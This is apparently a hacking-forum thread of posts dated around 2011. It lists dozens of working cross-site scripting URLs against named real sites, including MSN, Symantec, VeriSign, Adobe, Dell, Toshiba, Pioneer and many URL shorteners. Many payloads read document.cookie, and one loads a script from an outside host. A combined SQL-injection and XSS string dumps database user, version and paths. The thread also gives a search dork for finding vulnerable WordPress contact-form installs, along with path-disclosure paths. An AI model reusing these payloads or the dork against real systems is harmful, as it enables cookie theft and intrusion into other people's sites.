NitroSecurity

http://nitrosecurity.com/reset-password?destination="><script>alert(/XSS/)</script>

http://security-sh3ll.blogspot.com/

http://computer.de.msn.com/microsoft/windowslive/bilder.aspx?cp-documentid=153872687&page=false,false,false%29%3B%7D%29;%20alert(1%29;%20//

http://news.de.msn.com/politik/bilder.aspx?cp-documentid=151626105&page=false,false,false%29%3B%7D%29;%20alert(1%29;%20//

http://wissen.de.msn.com/bilder.aspx?cp-documentid=149972970&page=false,false,false%29%3B%7D%29;%20alert(1%29;%20//

http://money.de.msn.com/aktien/bilder.aspx?cp-documentid=151693088&page=false,false,false%29%3B%7D%29;%20alert(1%29;%20//

http://sport.de.msn.com/mehr_sport/bilder.aspx?cp-documentid=149936772&page=false,false,false%29%3B%7D%29;%20alert(1%29;%20//

http://rubrik.ch.msn.com/reportagen/diebestenbilderdesjahrzehnts.aspx?cp-documentid=151195126&page=false,false,false%29%3B%7D%29;%20alert(1%29;%20//

http://style.no.msn.com/nyheter/galleri.aspx?cp-documentid=153049228&page=false,false,false%29%3B%7D%29;%20alert(1%29;%20//

http://channels.se.msn.com/kungligt/bildspel.aspx?cp-documentid=153854453&page=false,false,false%29%3B%7D%29;%20alert(1%29;%20//

http://viaggi.it.msn.com/fotogallery/foto-estero.aspx?cp-documentid=151815851&page=false,false,false%29%3B%7D%29;%20alert(1%29;%20//

http://underholdning.no.msn.com/alice-in-wonderland/galleri.aspx?cp-documentid=152510323&page=false,false,false%29%3B%7D%29;%20alert(1%29;%20//

http://lifestyle.de.msn.com/bilder.aspx?cp-documentid=149807353&page=false,false,false%29%3B%7D%29;%20alert(1%29;%20//

http://www.xssed.com/archive/author=PaPPy/

http://d66.org/html/index_done.php?url=<script>alert(1);</script>&short_url=<script>alert(1);</script>

http://recaq.com/html/index_done.php?url=<script>alert(1);</script>&short_url=<script>alert(1);</script>

http://itt.im/html/index_done.php?url=<script>alert(1);</script>&short_url=<script>alert(1);</script>

http://bityurl.com/html/index_done.php?url=<script>alert(1);</script>&short_url=<script>alert(1);</script>

http://zisi.eu/html/index_done.php?url=<script>alert(1);</script>&short_url=<script>alert(1);</script>

http://ysht.tk/2/html/index_done.php?url=<script>alert(1);</script>&short_url=<script>alert(1);</script>

http://m.gavsta.com/html/index_done.php?url=<script>alert(1);</script>&short_url=<script>alert(1);</script>

due to this vulnerability
http://code.google.com/p/phurl/issues/detail?id=68

http://www.xssed.com/archive/author=PaPPy/

and all these, same vulnerability
http://d66.org/index.php/%22><script>alert(1);</script>
http://sa.feurl.com/index.php/%22><script>alert(1);</script>
http://recaq.com/index.php/%22><script>alert(1);</script>
http://linq.tk/index.php/%22><script>alert(1);</script>
http://xn--a-nga.eu/index.php/%22><script>alert(1);</script>
http://www.8u.com/index.php/%22><script>alert(1);</script>
http://ho.io/index.php/%22><script>alert(1);</script>
http://itt.im/index.php/%22><script>alert(1);</script>
http://www.scottfowles.net/phurl/index.php/%22><script>alert(1);</script>
http://wp.nu/index.php/%22><script>alert(1);</script>
http://go.ericjess.com/index.php/%22><script>alert(1);</script>
http://xpnd.us/index.php/%22><script>alert(1);</script>
http://chrl.nl/index.php/%22><script>alert(1);</script>
http://urlmx.co.cc/index.php/%22><script>alert(1);</script>
http://fedl.info/index.php/%22><script>alert(1);</script>
http://www.urlite.de/index.php/%22><script>alert(1);</script>
http://zisi.eu/index.php/%22><script>alert(1);</script>
http://ip.ru/index.php/%22><script>alert(1);</script>
http://www.rzr.im/index.php/%22><script>alert(1);</script>
http://www.urlite.de/index.php/%22><script>alert(1);</script>

http://www.xssed.com/archive/author=PaPPy/

CSO Online - Security and Risk XSS

http://www.csoonline.com/article/592818/the-hackid-conference-a-kid-friendly-idea-whose-time-has-come?source="><script>alert(String.fromCharCode(88,83,83))</script>

SearchSecurity.techtarget.com

http://searchsecuritychannel.techtarget.com/googleResults/1,296420,sid97,00.html?query="><script>alert(String.fromCharCode(88,83,83))</script>

http://security-sh3ll.blogspot.com/

CRM - Salesforce.com

http://www.salesforce.com/customers/?viewType="<marquee><img src=k onerror=alert("XSS") />

http://security-sh3ll.blogspot.com/

Symantec

http://www.symantec.com/avcenter/cgi-bin/nisurl.cgi?lang=fr&unblock="><script>alert(String.fromCharCode(88,83,83))</script>

http://seer.entsupport.symantec.com/email_forms/site_feedbck.asp?ddProduct="><script>alert(String.fromCharCode(88,83,83))</script>

http://security-sh3ll.blogspot.com/

Russian social network (maybe fake)

http://vkonutakte.ru/login.php?u=2&to=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

Mashable – The Social Media Guide

http://m.mashable.com/search?q="><script>alert(document.cookie)</script>

http://www.mashable.com/owa/votes?v=</script>'"><marquee><h1>"><script>alert("XSS")</script></h1></marquee>

http://security-sh3ll.blogspot.com/

Trustwave - ( RBSLynk Trustwave Certificates )

https://rbslynk.trustwave.com/getdur.php?c=10"><script>alert('XSS')</script>

http://security-sh3ll.blogspot.com/

VeriSign Securitycenter

https://securitycenter.verisign.com/contents_VRSN_US/orderStatusLearnMore.jsp?&product_name="><script>alert('XSS')</script>

http://security-sh3ll.blogspot.com/

GFI - Web, Email and Network Security solutions

http://www.gfi.com/cgi-bin/unsubscribe.asp?id="><script>alert(document.cookie)</script>

http://security-sh3ll.blogspot.com/

Hakin9 - IT Security Magazine

http://hakin9.org/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://security-sh3ll.blogspot.com/

M86 Security - Secure Web Gateway - Internet Security and Email Security

http://www.m86security.com/popup.asp?src=/images/diagrams/webmarshal_large.gif&w="><script>alert('XSS')</script>

http://security-sh3ll.blogspot.com/

@Fugitif

Are you on some sort of irony spree?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Gareth Heyes Wrote:
-------------------------------------------------------
> @Fugitif
>
> Are you on some sort of irony spree?

why?

http://security-sh3ll.blogspot.com/

MSN.COM domain

http://auto.fi.msn.com/page.php?page_id=6&td_id=200800024"><script>alert(document.cookie)</script>

http://recettes.styledevie.ca.msn.com/forum/message.php?id=244090"><script>alert(String.fromCharCode(88,83,83))</script>

http://guide-envies.femmes.fr.msn.com/produit_type.php?id=396&rub=11"><script>alert(document.cookie)</script>

http://horoscope.fr.be.msn.com/index.php/register/fr/abo=7/msg="><iframe src=index.htm

http://security-sh3ll.blogspot.com/

@Fugitif

Because you found loads of xss holes in sec companies

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

hxxp://www.cbc.ca/search/cbc?q=';alert(0);'

hxxp://www.rogers.com/web/Rogers.portal?Ntt=<script>alert(0)</script>&N=&_nfpb=true&_pageLabel=support_results

http://help.washingtonpost.com/ics/support/search.asp?task=knowledge&pageContentIdentifier=%22%22></a><iframe%20src=%22javascript:alert(1);%22></iframe><b

http://www.xssed.com/archive/author=PaPPy/

http://www.racing.ups.com/wp-content/plugins/upsracing/rating-control.php?type=<IFRAME HEIGHT=100% WIDTH=100% src=http://xssed.com>
http://yoseif.host.adobe.com/test.cgi/1<script>alert(document.cookie)</script>

http://niemannross.host.adobe.com/2010csbuDeveloperSummit/mobile/eachPresenter.php?fname=1<script>alert(document.cookie)</script>

http://dublinapps.host.adobe.com/index.php?destUrl="onmouseover=alert(document.cookie)="

http://www.peats.com/cgi-bin/search_v2.cgi?q=1<script>alert(document.cookie);</script> &search=Search

http://www.unionchandlery.ie/shopping_admin/product_details/product.cgi?cat=RADIOS&menu=1<IFRAME HEIGHT=100% WIDTH=100% src=http://xssed.com></iframe>&product=11733&sub=VHFS HANDHELD

http://xmm.esa.int/SYS/include/Mailer/RSSDmail.php?dom="<script>alert(document.cookie);</script>"

http://www.rssd.esa.int/herschel_webapps/1<script>alert(document.cookie);</script>

http://jpstore.dell.com/dfo/config.asp?nav=all&prod=1-->1<SCRIPT>alert(document.cookie)</SCRIPT><MARQUEE BGCOLOR="RED"><H1>XSS XSS XSS</H1></MARQUEE><IFRAME src=http://xssed.com></iframe><!--

http://support1.ap.dell.com/cn/zh/knowledgebase/advanceSearch.asp?CurrentPage=&fileDate=1&findText=1<SCRIPT>alert(document.cookie)</SCRIPT><MARQUEE BGCOLOR="RED"><H1>XSS XSS XSS</H1></MARQUEE><IFRAME src=http://xssed.com></iframe>



Edited 1 time(s). Last edit at 01/23/2011 01:49PM by VMw4r3.

http://sportsillustrated.cnn.com/search/?text=<iframe src%3Djavascript:alert(document.cookie);></iframe>&x=0&y=0

Fugitif Wrote:
-------------------------------------------------------
> Hakin9 - IT Security Magazine
>
>
> http://hakin9.org/app/ajax/www/_cms_menu_ajax?page
> _id=4046&portal_prefix=">alert('XSS')

The same XSS is on all sites on same server.

http://lpmagazine.org/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://phpsolmag.org/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://app-review.com/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://sqam.org/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://isecman.org/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://konferencje.software.com.pl/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://ffdmag.com/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://bsdmag.org/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://psdmag.org/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://photoshopdigitalpainting.com/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://itunderground.org/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://en.sdjournal.org/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://media.software.com.pl/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://konferencje.software.com.pl/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://gigacon.org/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://boston-review.com/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://sdcenter.pl/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://magazyn.businesscoachingmag.pl/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

XSS
[esbr.terra.com.br]
http://esbr.terra.com.br/pro.php?id=1<script>alert(document.cookie);</script><script language=JavaScript src=http://ha.ckers.org/s></script>

Sqli with XSS
[esbr.terra.com.br]
http://esbr.terra.com.br/pro.php?id=1' AND 1=2 UNION SELECT 1,concat_ws(0x3a,user(),database(),@@version,@@datadir),0x3C7363726970743E616C65727428646F63756D656E742E636F6F6B6965293B3C2F7363726970743E,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 and 'x'='x



Edited 2 time(s). Last edit at 02/28/2011 03:43PM by VMw4r3.

http://www.pioneerelectronics.com/PUSA/Search?keywords=<SCRIPT>alert(document.cookie)</SCRIPT>

http://www.pioneer-latin.com/en/search.html
postdata:
searchQuery=<SCRIPT>alert(document.cookie)</SCRIPT>

http://www.pioneerisrael.co.il/Pioneer/search.asp?submit.x=0&submit.y=0&search=<SCRIPT>alert(document.cookie)</SCRIPT>

http://www.pioneer.co.id/general/SearchResult.asp
postdata:
Keyword=%3CSCRIPT%3Ealert%28document.cookie%29%3C%2FSCRIPT%3E&x=0&y=0

http://www.pioneer.ph/general/SearchResult.asp
postdata:
Keyword=%3CSCRIPT%3Ealert%28document.cookie%29%3C%2FSCRIPT%3E&x=0&y=0



Edited 2 time(s). Last edit at 03/16/2011 03:54PM by VMw4r3.

http://groups.adobe.com/index.cfm?event=search.index&keywords="><script>alert(document.cookie)</script>

I think all the *.groups.adobe.com use the same vulnerable script.

http://lawpg.groups.adobe.com/index.cfm?event=search.index&keywords="><script>alert(document.cookie)</script>

--
http://dublinapps.host.adobe.com/se/shared/emailafriend.php?go="><script>alert(document.cookie)</script>

http://niemannross.host.adobe.com/2010csbuDeveloperSummit/mobile/eachSession.php?sessionID="><script>alert(document.cookie)</script>

http://niemannross.host.adobe.com/2010csbuDeveloperSummit/mobile/eachTrack.php?trackID=product"><script>alert(document.cookie)</script>

http://www.toshiba.com/ind/searchresult.jsp?scontains=<script>alert(document.cookie);</script> &x=0&y=0&item=product


This one only works with "<H1>XSS</H1>" tags in it ?

http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/outFrm.jsp?ofId=AskIris&searchString=<SCRIPT>alert(document.cookie)</SCRIPT><H1>XSS</H1>&x=0&y=0

http://justplaingeek.com/blog/wp-content/plugins/si-contact-form/captcha-secureimage/test/index.php/"/><script>alert(document.cookie)</script>

http://justplaingeek.com/blog/wp-content/plugins/si-contact-form/captcha-secureimage/test/index.php/"/><script>alert(document.cookie)</script>

http://blogs.ischool.utexas.edu/wp-content/plugins/si-contact-form/captcha-secureimage/test/index.php/"/><script>alert(document.cookie)</script>

http://elpismedicalcentre.com/blog/wp-content/plugins/si-contact-form/captcha-secureimage/test/index.php/"/></script><script>alert(document.cookie)</script>

http://www.sherrymichelle.com/ChaosBlog/wp-content/plugins/si-contact-form/captcha-secureimage/test/index.php/"/><script>alert(document.cookie)</script>

http://www.wiwaf.com/wp-content/plugins/si-contact-form/captcha-secureimage/test/index.php/"/><script>alert(document.cookie)</script>

http://alwayschristiankane.com/home/wp-content/plugins/si-contact-form/captcha-secureimage/test/index.php/"/><script>alert(document.cookie)</script>

Theres loads more...

Dork: inurl:"/si-contact-form/captcha-secureimage/"


Path disclosure:

/wp-content/plugins/si-contact-form/si-contact-form-process.php
/wp-content/plugins/si-contact-form/si-contact-form-admin.php
/wp-content/plugins/si-contact-form/si-contact-form.php
/wp-content/plugins/si-contact-form/si-contact-form-display.php